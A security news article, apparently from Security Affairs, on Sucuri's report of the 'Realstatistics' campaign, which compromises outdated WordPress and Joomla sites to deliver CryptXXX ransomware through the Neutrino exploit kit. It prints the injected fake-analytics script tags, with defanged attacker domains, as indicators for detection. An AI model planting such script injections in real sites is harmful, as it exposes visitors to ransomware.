U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Realstatistics campaign leads to ransomware via compromised sites

Threat actors in the wild are behind the Realstatistics campaign are leveraging on out-of-date CMSs to deliver the CryptXXX ransomware. Security experts from Sucuri security firm have spotted a new ransomware-based campaign dubbed ‘Realstatistics’ conducted by threat actors in the past two weeks. “Our Incident Response Team (IRT) has been tracking a mass infection campaign over the […]

Realstatistics campaign leads to ransomware via compromised sites

Threat actors in the wild are behind the Realstatistics campaign are leveraging on out-of-date CMSs to deliver the CryptXXX ransomware.

Security experts from Sucuri security firm have spotted a new ransomware-based campaign dubbed ‘Realstatistics’ conducted by threat actors in the past two weeks.

“Our Incident Response Team (IRT) has been tracking a mass infection campaign over the last two weeks ( codenamed “Realstatistics“). This campaign has compromised thousands of websites built on the Joomla! and WordPress Content Management System (CMS).” states Sucuri in a blog post. “We have codenamed the campaign “Realstatistics” because of the domain being used by the attackers”

Experts estimated that over 2,000 websites running out-of-date CMSs have been already infected, and at least 100 new websites are infected every day.

Sucuri Realstatistics Campaign 650x286

The vast majority of the infected websites (90 percent) is running an older version of CMS platforms, 60% of them is based on WordPress and Joomla.

The experts discovered that threat actors are injecting the following fake analytics code into the PHP template of every compromised site:

<script language="JavaScript"

src="http://realstatistics[.]info[/]js/analytic.php?id=4"

<script language="JavaScript"

src="http://realstatistics[.]pro[/]js/analytic.php?id=4"

The analysis of compromised websites revealed that threat actors behind the Realstatistics campaign are most likely exploiting vulnerabilities in plugins to hack them.

The domain realstatistics[.]info was the first spotted in the wild around June 9th, later on Jul 1st attackers switched on realstatistics[.]pro. Both domains are still being used by the attackers.

The researchers noticed that the malicious campaign redirects visitors to websites hosting the Neutrino Exploit Kit used to deliver the CryptXXX ransomware. Traffic hijacking is obtained by injecting a malicious JS script loaded from these two domains.

If you want to check if your website is infected use the Sucuri SiteCheck, or simply look for the fake analytics code reported above.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Realstatistics campaign, ransomware)